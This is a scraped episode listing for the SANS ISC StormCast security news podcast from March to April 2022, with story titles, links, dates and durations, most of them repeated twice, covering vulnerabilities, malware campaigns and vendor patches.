Misc Spring4Shell Items https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67 https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html https://github.com/AgainstTheWest/NginxDay Russian Certificate Authority Update https://koen.engineer/russias-certificate-authority-for-sanctioned-organizations-645d61af8ac6 Conti Source Code Leak Leads to Copycats https://www.bleepingcomputer.com/news/security/hackers-use-contis-leaked-ransomware-to-attack-russian-companies/
4/11/20226 minutes, 15 seconds
Episode Artwork

ISC StormCast for Friday, April 8th, 2022

What is BIMI https://isc.sans.edu/forums/diary/What+is+BIMI+and+how+is+it+supposed+to+help+with+Phishing/28528/ Watchguard Vulnerability behind Cyclops Blink https://techsearch.watchguard.com/KB?type=Article&SFDCID=kA16S000000SOCGSA4&lang=en_US Malware Targeting Amazon Lambdas https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/ Ashley Taylor: Doppelgaengers: Finding Job Scammers Who Steal Brand Identities https://www.sans.edu/cyber-research/doppelgangers-finding-job-scammers-who-steal-brand-identities/
4/8/202215 minutes, 36 seconds
Episode Artwork

ISC StormCast for Friday, April 8th, 2022

What is BIMI https://isc.sans.edu/forums/diary/What+is+BIMI+and+how+is+it+supposed+to+help+with+Phishing/28528/ Watchguard Vulnerability behind Cyclops Blink https://techsearch.watchguard.com/KB?type=Article&SFDCID=kA16S000000SOCGSA4&lang=en_US Malware Targeting Amazon Lambdas https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/ Ashley Taylor: Doppelgaengers: Finding Job Scammers Who Steal Brand Identities https://www.sans.edu/cyber-research/doppelgangers-finding-job-scammers-who-steal-brand-identities/
4/8/202215 minutes, 36 seconds
Episode Artwork

ISC StormCast for Thursday, April 7th, 2022

Windows MetaStealer Malware https://isc.sans.edu/forums/diary/Windows+MetaStealer+Malware/28522/ US Justice Depatment Takes Down Cyclops Blink Botnet https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-disruption-botnet-controlled-russian-federation VMWare Bugs https://www.vmware.com/security/advisories.html Palo Alto CVE-2022-0778 https://security.paloaltonetworks.com/CVE-2022-0778 Unpatched Apple Bug https://www.intego.com/mac-security-blog/apple-neglects-to-patch-zero-day-wild-vulnerabilities-for-macos-big-sur-catalina/
4/7/20226 minutes, 18 seconds
Episode Artwork

ISC StormCast for Thursday, April 7th, 2022

Windows MetaStealer Malware https://isc.sans.edu/forums/diary/Windows+MetaStealer+Malware/28522/ US Justice Depatment Takes Down Cyclops Blink Botnet https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-disruption-botnet-controlled-russian-federation VMWare Bugs https://www.vmware.com/security/advisories.html Palo Alto CVE-2022-0778 https://security.paloaltonetworks.com/CVE-2022-0778 Unpatched Apple Bug https://www.intego.com/mac-security-blog/apple-neglects-to-patch-zero-day-wild-vulnerabilities-for-macos-big-sur-catalina/
4/7/20226 minutes, 18 seconds
Episode Artwork

ISC StormCast for Wednesday, April 6th, 2022

WebLogic Crypto Miner Malware Disabling Alibaba Cloud Monitoring Tools https://isc.sans.edu/forums/diary/WebLogic+Crypto+Miner+Malware+Disabling+Alibaba+Cloud+Monitoring+Tools/28520/ Cicada: Chinese APT Group Widens Targeting in Recent Espionage Activity https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks New Security Features for Windows 11 https://www.microsoft.com/security/blog/2022/04/05/new-security-features-for-windows-11-will-help-protect-hybrid-work/ Fin7 Power Hour: Adversary Archaeology and Evolution of FIN7 https://www.mandiant.com/resources/evolution-of-fin7
4/6/20226 minutes, 30 seconds
Episode Artwork

ISC StormCast for Wednesday, April 6th, 2022

WebLogic Crypto Miner Malware Disabling Alibaba Cloud Monitoring Tools https://isc.sans.edu/forums/diary/WebLogic+Crypto+Miner+Malware+Disabling+Alibaba+Cloud+Monitoring+Tools/28520/ Cicada: Chinese APT Group Widens Targeting in Recent Espionage Activity https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks New Security Features for Windows 11 https://www.microsoft.com/security/blog/2022/04/05/new-security-features-for-windows-11-will-help-protect-hybrid-work/ Fin7 Power Hour: Adversary Archaeology and Evolution of FIN7 https://www.mandiant.com/resources/evolution-of-fin7
4/6/20226 minutes, 30 seconds
Episode Artwork

ISC StormCast for Tuesday, April 5th, 2022

Emptying the Phishtank: Are WordPress Sites the Mosquitoes of the Internet https://isc.sans.edu/forums/diary/Emptying+the+Phishtank+Are+WordPress+sites+the+Mosquitoes+of+the+Internet/28516/ Mailchimp Breach Used to Target Trezor Users https://www.bleepingcomputer.com/news/security/hackers-breach-mailchimps-internal-tools-to-target-crypto-customers/ Proactively Prevent Secret Leaks With GitHub Advanced Security Secret Scanning https://github.blog/2022-04-04-push-protection-github-advanced-security/ TruffleHog v3 https://trufflesecurity.com/blog/introducing-trufflehog-v3 Russian Certificates (chinese article) https://blog.netlab.360.com/review-revoke-russia-ssl-certificates/
4/5/20226 minutes, 13 seconds
Episode Artwork

ISC StormCast for Tuesday, April 5th, 2022

Emptying the Phishtank: Are WordPress Sites the Mosquitoes of the Internet https://isc.sans.edu/forums/diary/Emptying+the+Phishtank+Are+WordPress+sites+the+Mosquitoes+of+the+Internet/28516/ Mailchimp Breach Used to Target Trezor Users https://www.bleepingcomputer.com/news/security/hackers-breach-mailchimps-internal-tools-to-target-crypto-customers/ Proactively Prevent Secret Leaks With GitHub Advanced Security Secret Scanning https://github.blog/2022-04-04-push-protection-github-advanced-security/ TruffleHog v3 https://trufflesecurity.com/blog/introducing-trufflehog-v3 Russian Certificates (chinese article) https://blog.netlab.360.com/review-revoke-russia-ssl-certificates/
4/5/20226 minutes, 13 seconds
Episode Artwork

ISC StormCast for Monday, April 4th, 2022

GitLab Critical Security Release https://about.gitlab.com/releases/2022/03/31/critical-security-release-gitlab-14-9-2-released/ ViaSat KA-SAT Network Cyber Attack https://www.viasat.com/about/newsroom/blog/ka-sat-network-cyber-attack-overview/ MacOS Bug Enables Phishing https://rambo.codes/posts/2022-03-15-how-a-macos-bug-could-have-allowed-for-a-serious-phishing-attack-against-users PHP Supply Chain Attack on PEAR https://blog.sonarsource.com/php-supply-chain-attack-on-pear
4/4/20226 minutes, 19 seconds
Episode Artwork

ISC StormCast for Monday, April 4th, 2022

GitLab Critical Security Release https://about.gitlab.com/releases/2022/03/31/critical-security-release-gitlab-14-9-2-released/ ViaSat KA-SAT Network Cyber Attack https://www.viasat.com/about/newsroom/blog/ka-sat-network-cyber-attack-overview/ MacOS Bug Enables Phishing https://rambo.codes/posts/2022-03-15-how-a-macos-bug-could-have-allowed-for-a-serious-phishing-attack-against-users PHP Supply Chain Attack on PEAR https://blog.sonarsource.com/php-supply-chain-attack-on-pear
4/4/20226 minutes, 19 seconds
Episode Artwork

ISC StormCast for Friday, April 1st, 2022

Spring Vulnerability Update - Exploitation Attempts CVE-2022-22965 https://isc.sans.edu/forums/diary/Spring+Vulnerability+Update+Exploitation+Attempts+CVE202222965/28504/ Apple Patches 0 Day Vulnerability https://isc.sans.edu/forums/diary/Apple+Patches+Actively+Exploited+Vulnerability+in+macOS+iOS+and+iPadOS/28506/ Wyze Cam Vulnerabilities https://www.bitdefender.com/files/News/CaseStudies/study/413/Bitdefender-PR-Whitepaper-WCam-creat5991-en-EN.pdf Zyxel Security Advisory https://www.zyxel.com/support/forgery-vulnerabilities-of-select-Armor-home-routers.shtml
4/1/20225 minutes, 35 seconds
Episode Artwork

ISC StormCast for Friday, April 1st, 2022

Spring Vulnerability Update - Exploitation Attempts CVE-2022-22965 https://isc.sans.edu/forums/diary/Spring+Vulnerability+Update+Exploitation+Attempts+CVE202222965/28504/ Apple Patches 0 Day Vulnerability https://isc.sans.edu/forums/diary/Apple+Patches+Actively+Exploited+Vulnerability+in+macOS+iOS+and+iPadOS/28506/ Wyze Cam Vulnerabilities https://www.bitdefender.com/files/News/CaseStudies/study/413/Bitdefender-PR-Whitepaper-WCam-creat5991-en-EN.pdf Zyxel Security Advisory https://www.zyxel.com/support/forgery-vulnerabilities-of-select-Armor-home-routers.shtml
4/1/20225 minutes, 35 seconds
Episode Artwork

ISC StormCast for Thursday, March 31st, 2022

Java Springtime Confusion: What Vulnerabilty are We Talking About https://isc.sans.edu/forums/diary/Java+Springtime+Confusion+What+Vulnerability+are+We+Talking+About/28500/ Quickie: Parsing XLSB Documents https://isc.sans.edu/forums/diary/Quickie+Parsing+XLSB+Documents/28496/ Pwning 3CX Phone Management Backends from the Internet https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88
3/31/20225 minutes, 56 seconds
Episode Artwork

ISC StormCast for Thursday, March 31st, 2022

Java Springtime Confusion: What Vulnerabilty are We Talking About https://isc.sans.edu/forums/diary/Java+Springtime+Confusion+What+Vulnerability+are+We+Talking+About/28500/ Quickie: Parsing XLSB Documents https://isc.sans.edu/forums/diary/Quickie+Parsing+XLSB+Documents/28496/ Pwning 3CX Phone Management Backends from the Internet https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88
3/31/20225 minutes, 56 seconds
Episode Artwork

ISC StormCast for Wednesday, March 30th, 2022

More Fake/Typosquatting Twitter Accounts Asking for Ukraine Cryptocurrency Donations https://isc.sans.edu/forums/diary/More+FakeTyposquatting+Twitter+Accounts+Asking+for+Ukraine+Crytocurrency+Donations/28492/ Mitigating Attacks Against Uninterruptible Power Supply Devices https://www.cisa.gov/sites/default/files/publications/CISA-DOE_Insights-Mitigating_Vulnerabilities_Affecting_Uninterruptible_Power_Supply_Devices_Mar_29.pdf MFA Bypass Attacks https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html Google Advertises Mars Stealer https://blog.morphisec.com/threat-research-mars-stealer Hackers Gaining Power of Subpoena Via Fake "Emergency Data Requests" https://krebsonsecurity.com/2022/03/hackers-gaining-power-of-subpoena-via-fake-emergency-data-requests/
3/30/20226 minutes, 44 seconds
Episode Artwork

ISC StormCast for Wednesday, March 30th, 2022

More Fake/Typosquatting Twitter Accounts Asking for Ukraine Cryptocurrency Donations https://isc.sans.edu/forums/diary/More+FakeTyposquatting+Twitter+Accounts+Asking+for+Ukraine+Crytocurrency+Donations/28492/ Mitigating Attacks Against Uninterruptible Power Supply Devices https://www.cisa.gov/sites/default/files/publications/CISA-DOE_Insights-Mitigating_Vulnerabilities_Affecting_Uninterruptible_Power_Supply_Devices_Mar_29.pdf MFA Bypass Attacks https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html Google Advertises Mars Stealer https://blog.morphisec.com/threat-research-mars-stealer Hackers Gaining Power of Subpoena Via Fake "Emergency Data Requests" https://krebsonsecurity.com/2022/03/hackers-gaining-power-of-subpoena-via-fake-emergency-data-requests/
3/30/20226 minutes, 44 seconds
Episode Artwork

ISC StormCast for Tuesday, March 29th, 2022

BGP Hijacking of Twitter Prefix by RTComm.ru https://isc.sans.edu/forums/diary/BGP+Hijacking+of+Twitter+Prefix+by+RTCommru/28488/ DDoS Against Sites in Ukraine https://www.bleepingcomputer.com/news/security/hacked-wordpress-sites-force-visitors-to-ddos-ukrainian-targets/ Sophos Patches https://www.sophos.com/en-us/security-advisories/sophos-sa-20220325-sfos-rce Sonicwall Patches https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0003 opnsense CARP protocol routing error https://medium.com/sensorfu/firewall-bypass-with-carp-in-packet-filter-c4ed70fb7dd7
3/29/20226 minutes, 4 seconds
Episode Artwork

ISC StormCast for Tuesday, March 29th, 2022

BGP Hijacking of Twitter Prefix by RTComm.ru https://isc.sans.edu/forums/diary/BGP+Hijacking+of+Twitter+Prefix+by+RTCommru/28488/ DDoS Against Sites in Ukraine https://www.bleepingcomputer.com/news/security/hacked-wordpress-sites-force-visitors-to-ddos-ukrainian-targets/ Sophos Patches https://www.sophos.com/en-us/security-advisories/sophos-sa-20220325-sfos-rce Sonicwall Patches https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0003 opnsense CARP protocol routing error https://medium.com/sensorfu/firewall-bypass-with-carp-in-packet-filter-c4ed70fb7dd7
3/29/20226 minutes, 4 seconds
Episode Artwork

ISC StormCast for Monday, March 28th, 2022

XLSB Files Because Binary is Stealthier Than XML https://isc.sans.edu/forums/diary/XLSB+Files+Because+Binary+is+Stealthier+Than+XML/28476/ Dirty Pipe Container Escape PoC https://www.datadoghq.com/blog/engineering/dirty-pipe-container-escape-poc/ PHP filter_var Shenanigans https://pwning.systems/posts/php_filter_var_shenanigans/ OpenBSD slaacd vuln https://blog.quarkslab.com/heap-overflow-in-openbsds-slaacd-via-router-advertisement.html Google Chrome Update https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html
3/28/20226 minutes, 16 seconds
Episode Artwork

ISC StormCast for Monday, March 28th, 2022

XLSB Files Because Binary is Stealthier Than XML https://isc.sans.edu/forums/diary/XLSB+Files+Because+Binary+is+Stealthier+Than+XML/28476/ Dirty Pipe Container Escape PoC https://www.datadoghq.com/blog/engineering/dirty-pipe-container-escape-poc/ PHP filter_var Shenanigans https://pwning.systems/posts/php_filter_var_shenanigans/ OpenBSD slaacd vuln https://blog.quarkslab.com/heap-overflow-in-openbsds-slaacd-via-router-advertisement.html Google Chrome Update https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html
3/28/20226 minutes, 16 seconds
Episode Artwork

ISC StormCast for Friday, March 25th, 2022

Malware Delivered Through Free Sharing Tool https://isc.sans.edu/forums/diary/Malware+Delivered+Through+Free+Sharing+Tool/28474/ Western Digital PR4100 NAS Vulnerabilty https://research.nccgroup.com/2022/03/24/remote-code-execution-on-western-digital-pr4100-nas-cve-2022-23121/ Crypto malware in patched wallets targeting Android and iOS devices https://www.welivesecurity.com/2022/03/24/crypto-malware-patched-wallets-targeting-android-ios-devices/ Lapsus$ Arrest https://www.bbc.com/news/technology-60864283 https://www.bloomberg.com/news/articles/2022-03-23/teen-suspected-by-cyber-researchers-of-being-lapsus-mastermind?sref=ylv224K8 Four Russian Government Employees Charged in Two Historical Hacking Campaigns Targeting Critical Infrastructure Worldwide https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical
3/25/20225 minutes, 56 seconds
Episode Artwork

ISC StormCast for Friday, March 25th, 2022

Malware Delivered Through Free Sharing Tool https://isc.sans.edu/forums/diary/Malware+Delivered+Through+Free+Sharing+Tool/28474/ Western Digital PR4100 NAS Vulnerabilty https://research.nccgroup.com/2022/03/24/remote-code-execution-on-western-digital-pr4100-nas-cve-2022-23121/ Crypto malware in patched wallets targeting Android and iOS devices https://www.welivesecurity.com/2022/03/24/crypto-malware-patched-wallets-targeting-android-ios-devices/ Lapsus$ Arrest https://www.bbc.com/news/technology-60864283 https://www.bloomberg.com/news/articles/2022-03-23/teen-suspected-by-cyber-researchers-of-being-lapsus-mastermind?sref=ylv224K8 Four Russian Government Employees Charged in Two Historical Hacking Campaigns Targeting Critical Infrastructure Worldwide https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical
3/25/20225 minutes, 56 seconds
Episode Artwork

ISC StormCast for Thursday, March 24th, 2022

Mars Stealer https://isc.sans.edu/forums/diary/Arkei+Variants+From+Vidar+to+Mars+Stealer/28468/ Okta Update https://www.okta.com/blog/2022/03/oktas-investigation-of-the-january-2022-compromise/ Microsoft Lapsus$ Update https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ npm Attack Targeting Azure Developers https://jfrog.com/blog/large-scale-npm-attack-targets-azure-developers-with-malicious-packages/
3/24/20226 minutes, 18 seconds
Episode Artwork

ISC StormCast for Thursday, March 24th, 2022

Mars Stealer https://isc.sans.edu/forums/diary/Arkei+Variants+From+Vidar+to+Mars+Stealer/28468/ Okta Update https://www.okta.com/blog/2022/03/oktas-investigation-of-the-january-2022-compromise/ Microsoft Lapsus$ Update https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ npm Attack Targeting Azure Developers https://jfrog.com/blog/large-scale-npm-attack-targets-azure-developers-with-malicious-packages/
3/24/20226 minutes, 18 seconds
Episode Artwork

ISC StormCast for Wednesday, March 23rd, 2022

Statement by President Biden: What you need to do (or not do) https://isc.sans.edu/forums/diary/Statement+by+President+Biden+What+you+need+to+do+or+not+do/28466/ ASUS Cyclops Blink Advisory https://www.asus.com/content/ASUS-Product-Security-Advisory/ HP Vulnerabilities https://support.hp.com/us-en/document/ish_5948778-5949142-16/hpsbpi03780 Sophos UTM Updates https://www.sophos.com/en-us/security-advisories/sophos-sa-20220321-utm-9710 MacOS GIMMICK Malware https://www.volexity.com/blog/2022/03/22/storm-cloud-on-the-horizon-gimmick-malware-strikes-at-macos/ Octa Breached By Lapsus https://www.okta.com/blog/2022/03/updated-okta-statement-on-lapsus/ https://twitter.com/BillDemirkapi/status/1506107157124722690
3/23/20227 minutes, 18 seconds
Episode Artwork

ISC StormCast for Wednesday, March 23rd, 2022

Statement by President Biden: What you need to do (or not do) https://isc.sans.edu/forums/diary/Statement+by+President+Biden+What+you+need+to+do+or+not+do/28466/ ASUS Cyclops Blink Advisory https://www.asus.com/content/ASUS-Product-Security-Advisory/ HP Vulnerabilities https://support.hp.com/us-en/document/ish_5948778-5949142-16/hpsbpi03780 Sophos UTM Updates https://www.sophos.com/en-us/security-advisories/sophos-sa-20220321-utm-9710 MacOS GIMMICK Malware https://www.volexity.com/blog/2022/03/22/storm-cloud-on-the-horizon-gimmick-malware-strikes-at-macos/ Octa Breached By Lapsus https://www.okta.com/blog/2022/03/updated-okta-statement-on-lapsus/ https://twitter.com/BillDemirkapi/status/1506107157124722690
3/23/20227 minutes, 18 seconds
Episode Artwork

ISC StormCast for Tuesday, March 22nd, 2022

Maldoc Cleaned by Anti-Virus https://isc.sans.edu/forums/diary/Maldoc+Cleaned+by+AntiVirus/28460/ Serpent, No Swiping! New Backdoor Targets French Entities with Unique Attack Chain https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain IBM Spectrum Protect Update https://www.ibm.com/support/pages/node/6564745 Lapsus$ May have Breached Microsoft https://www.theregister.com/2022/03/21/microsoft_lapsus_breach_probe/ Statement by President Biden on our Nation's Cybersecurity https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/21/statement-by-president-biden-on-our-nations-cybersecurity/
3/22/20227 minutes, 35 seconds
Episode Artwork

ISC StormCast for Tuesday, March 22nd, 2022

Maldoc Cleaned by Anti-Virus https://isc.sans.edu/forums/diary/Maldoc+Cleaned+by+AntiVirus/28460/ Serpent, No Swiping! New Backdoor Targets French Entities with Unique Attack Chain https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain IBM Spectrum Protect Update https://www.ibm.com/support/pages/node/6564745 Lapsus$ May have Breached Microsoft https://www.theregister.com/2022/03/21/microsoft_lapsus_breach_probe/ Statement by President Biden on our Nation's Cybersecurity https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/21/statement-by-president-biden-on-our-nations-cybersecurity/
3/22/20227 minutes, 35 seconds
Episode Artwork

ISC StormCast for Monday, March 21st, 2022

Scans for Movable Type Vulnerability (CVE-2021-20837) https://isc.sans.edu/forums/diary/Scans+for+Movable+Type+Vulnerability+CVE202120837/28454/ SolarWinds Advisory: Unauahtneticated Access in Web Help Desk (12.7.5) https://isc.sans.edu/forums/diary/SolarWinds+Advisory+Unauthenticated+Access+in+Web+Help+Desk+1275/28456/ MGLNDD_* Scans https://isc.sans.edu/forums/diary/MGLNDD+Scans/28458/ CAPTCHA Phishing https://www.avanan.com/blog/using-captcha-forms-to-bypass-filters Browser in the Browser Templates https://mrd0x.com/browser-in-the-browser-phishing-attack/
3/21/20226 minutes, 6 seconds
Episode Artwork

ISC StormCast for Monday, March 21st, 2022

Scans for Movable Type Vulnerability (CVE-2021-20837) https://isc.sans.edu/forums/diary/Scans+for+Movable+Type+Vulnerability+CVE202120837/28454/ SolarWinds Advisory: Unauahtneticated Access in Web Help Desk (12.7.5) https://isc.sans.edu/forums/diary/SolarWinds+Advisory+Unauthenticated+Access+in+Web+Help+Desk+1275/28456/ MGLNDD_* Scans https://isc.sans.edu/forums/diary/MGLNDD+Scans/28458/ CAPTCHA Phishing https://www.avanan.com/blog/using-captcha-forms-to-bypass-filters Browser in the Browser Templates https://mrd0x.com/browser-in-the-browser-phishing-attack/
3/21/20226 minutes, 6 seconds
Episode Artwork

ISC StormCast for Friday, March 18th, 2022

npm Package Sabotaged for Belarus/Russian Users https://snyk.io/blog/peacenotwar-malicious-npm-node-ipc-package-vulnerability/ President Zelensky Deepfakes https://twitter.com/ngleicher/status/1504186935291506693 ATM Rootkit https://www.mandiant.com/resources/unc2891-overview Scanner for Backdoored Mikrotik Routers https://github.com/microsoft/routeros-scanner SANS.edu Student: Ron Grohman; Network Access Control and ICS: A Practical Guide https://www.sans.edu/cyber-research/network-access-control-and-ics-a-practical-guide/
3/18/202214 minutes, 33 seconds
Episode Artwork

ISC StormCast for Friday, March 18th, 2022

npm Package Sabotaged for Belarus/Russian Users https://snyk.io/blog/peacenotwar-malicious-npm-node-ipc-package-vulnerability/ President Zelensky Deepfakes https://twitter.com/ngleicher/status/1504186935291506693 ATM Rootkit https://www.mandiant.com/resources/unc2891-overview Scanner for Backdoored Mikrotik Routers https://github.com/microsoft/routeros-scanner SANS.edu Student: Ron Grohman; Network Access Control and ICS: A Practical Guide https://www.sans.edu/cyber-research/network-access-control-and-ics-a-practical-guide/
3/18/202214 minutes, 33 seconds
Episode Artwork

ISC StormCast for Thursday, March 17th, 2022

Qakbot Infection With Cobalt Strike and VNC Activity https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike+and+VNC+activity/28448/ Gh0stCringe RAT Being Distributed to Vulnerable Database Servers https://asec.ahnlab.com/en/32572/ dompdf 0 day https://positive.security/blog/dompdf-rce OpenSSL DoS Vulnerability https://www.openssl.org/news/secadv/20220315.txt
3/17/20225 minutes, 32 seconds
Episode Artwork

ISC StormCast for Thursday, March 17th, 2022

Qakbot Infection With Cobalt Strike and VNC Activity https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike+and+VNC+activity/28448/ Gh0stCringe RAT Being Distributed to Vulnerable Database Servers https://asec.ahnlab.com/en/32572/ dompdf 0 day https://positive.security/blog/dompdf-rce OpenSSL DoS Vulnerability https://www.openssl.org/news/secadv/20220315.txt
3/17/20225 minutes, 32 seconds
Episode Artwork

ISC StormCast for Wednesday, March 16th, 2022

Clean Binaries with Suspicious Behaviour https://isc.sans.edu/forums/diary/Clean+Binaries+with+Suspicious+Behaviour/28444/ Misconfigured Multi-Factor Authentication Abused https://www.cisa.gov/uscert/ncas/alerts/aa22-074a German Office of Information Security Warns Kaspersky Users https://www.bsi.bund.de/DE/Service-Navi/Presse/Pressemitteilungen/Presse2022/220315_Kaspersky-Warnung.html Caddy Wiper Targeting Ukraine https://www.welivesecurity.com/2022/03/15/caddywiper-new-wiper-malware-discovered-ukraine/ Fake Antivirus Targeting Ukraine https://twitter.com/malwrhunterteam/status/1502302718140035080 B1txor20 DNS Tunnel Backdoor https://blog.netlab.360.com/b1txor20-use-of-dns-tunneling_en/
3/16/20225 minutes, 6 seconds
Episode Artwork

ISC StormCast for Wednesday, March 16th, 2022

Clean Binaries with Suspicious Behaviour https://isc.sans.edu/forums/diary/Clean+Binaries+with+Suspicious+Behaviour/28444/ Misconfigured Multi-Factor Authentication Abused https://www.cisa.gov/uscert/ncas/alerts/aa22-074a German Office of Information Security Warns Kaspersky Users https://www.bsi.bund.de/DE/Service-Navi/Presse/Pressemitteilungen/Presse2022/220315_Kaspersky-Warnung.html Caddy Wiper Targeting Ukraine https://www.welivesecurity.com/2022/03/15/caddywiper-new-wiper-malware-discovered-ukraine/ Fake Antivirus Targeting Ukraine https://twitter.com/malwrhunterteam/status/1502302718140035080 B1txor20 DNS Tunnel Backdoor https://blog.netlab.360.com/b1txor20-use-of-dns-tunneling_en/
3/16/20225 minutes, 6 seconds
Episode Artwork

ISC StormCast for Tuesday, March 15th, 2022

Apple Updates Everything https://isc.sans.edu/forums/diary/Apple+Updates+Everything+MacOS+123+XCode+133+tvOS+154+watchOS+85+iPadOS+154+and+more/28438/ Look Alike Accounts Used in Ukraine Dontation Scam Impersonating Olena Zelenska https://isc.sans.edu/forums/diary/Look+Alike+Accounts+Used+in+Ukraine+Donation+Scam+impersonating+Olena+Zelenska/28440/ Curl on Windows https://isc.sans.edu/forums/diary/Curl+on+Windows/28436/ Veeam Vulnerabilities https://www.veeam.com/kb4288 Linux Netfilter Privilege Escalation https://nickgregory.me/linux/security/2022/03/12/cve-2022-25636/
3/15/20225 minutes, 40 seconds
Episode Artwork

ISC StormCast for Tuesday, March 15th, 2022

Apple Updates Everything https://isc.sans.edu/forums/diary/Apple+Updates+Everything+MacOS+123+XCode+133+tvOS+154+watchOS+85+iPadOS+154+and+more/28438/ Look Alike Accounts Used in Ukraine Dontation Scam Impersonating Olena Zelenska https://isc.sans.edu/forums/diary/Look+Alike+Accounts+Used+in+Ukraine+Donation+Scam+impersonating+Olena+Zelenska/28440/ Curl on Windows https://isc.sans.edu/forums/diary/Curl+on+Windows/28436/ Veeam Vulnerabilities https://www.veeam.com/kb4288 Linux Netfilter Privilege Escalation https://nickgregory.me/linux/security/2022/03/12/cve-2022-25636/
3/15/20225 minutes, 40 seconds
Episode Artwork

ISC StormCast for Monday, March 14th, 2022

Malware Using WebSockets For C&C https://isc.sans.edu/forums/diary/Keep+an+Eye+on+WebSockets/28430/ Racoon Stealer leverages Telegram https://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram/ USAHERDS Hack https://www.wired.com/story/china-apt41-hacking-usaherds-log4j/ YARA 4.2.0 Released https://isc.sans.edu/forums/diary/YARA+420+Released/28432/
3/14/20225 minutes, 27 seconds
Episode Artwork

ISC StormCast for Monday, March 14th, 2022

Malware Using WebSockets For C&C https://isc.sans.edu/forums/diary/Keep+an+Eye+on+WebSockets/28430/ Racoon Stealer leverages Telegram https://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram/ USAHERDS Hack https://www.wired.com/story/china-apt41-hacking-usaherds-log4j/ YARA 4.2.0 Released https://isc.sans.edu/forums/diary/YARA+420+Released/28432/
3/14/20225 minutes, 27 seconds
Episode Artwork

ISC StormCast for Friday, March 11th, 2022

Credential Leaks on Virustotal https://isc.sans.edu/forums/diary/Credentials+Leaks+on+VirusTotal/28426/ GPS Issues Around Finish Rusian Border https://www.straitstimes.com/world/europe/finland-detects-gps-disturbance-near-russias-kaliningrad Russia Considering Internal Certificate Authority https://www.gosuslugi.ru/tls https://www.bleepingcomputer.com/news/security/russia-creates-its-own-tls-certificate-authority-to-bypass-sanctions/ New Spectre Variant https://www.vusec.net/projects/bhi-spectre-bhb/ Package Manager Vulnerabilities (yarn, pip, composer...) https://blog.sonarsource.com/securing-developer-tools-package-managers
3/11/20225 minutes, 32 seconds
Episode Artwork

ISC StormCast for Friday, March 11th, 2022

Credential Leaks on Virustotal https://isc.sans.edu/forums/diary/Credentials+Leaks+on+VirusTotal/28426/ GPS Issues Around Finish Rusian Border https://www.straitstimes.com/world/europe/finland-detects-gps-disturbance-near-russias-kaliningrad Russia Considering Internal Certificate Authority https://www.gosuslugi.ru/tls https://www.bleepingcomputer.com/news/security/russia-creates-its-own-tls-certificate-authority-to-bypass-sanctions/ New Spectre Variant https://www.vusec.net/projects/bhi-spectre-bhb/ Package Manager Vulnerabilities (yarn, pip, composer...) https://blog.sonarsource.com/securing-developer-tools-package-managers
3/11/20225 minutes, 32 seconds
Episode Artwork

ISC StormCast for Thursday, March 10th, 2022

Infostealer in a Batch File https://isc.sans.edu/forums/diary/Infostealer+in+a+Batch+File/28422/ TP240PhoneHome reflection/amplification DDoS Attack Vector https://blog.cloudflare.com/cve-2022-26143/ Malware Disguises as Pro Ukrainian Cybertools https://blog.talosintelligence.com/2022/03/threat-advisory-cybercriminals.html#more Russian Government Sites Hacked in Supply Chain Attack https://www.bleepingcomputer.com/news/security/russian-government-sites-hacked-in-supply-chain-attack/ Third Party Vulnerabilities in RUGGEDCOM ROS https://cert-portal.siemens.com/productcert/pdf/ssa-256353.pdf Adobe Bulletins https://helpx.adobe.com/security/security-bulletin.html
3/10/20226 minutes, 15 seconds
Episode Artwork

ISC StormCast for Thursday, March 10th, 2022

Infostealer in a Batch File https://isc.sans.edu/forums/diary/Infostealer+in+a+Batch+File/28422/ TP240PhoneHome reflection/amplification DDoS Attack Vector https://blog.cloudflare.com/cve-2022-26143/ Malware Disguises as Pro Ukrainian Cybertools https://blog.talosintelligence.com/2022/03/threat-advisory-cybercriminals.html#more Russian Government Sites Hacked in Supply Chain Attack https://www.bleepingcomputer.com/news/security/russian-government-sites-hacked-in-supply-chain-attack/ Third Party Vulnerabilities in RUGGEDCOM ROS https://cert-portal.siemens.com/productcert/pdf/ssa-256353.pdf Adobe Bulletins https://helpx.adobe.com/security/security-bulletin.html
3/10/20226 minutes, 15 seconds
Episode Artwork

ISC StormCast for Wednesday, March 9th, 2022

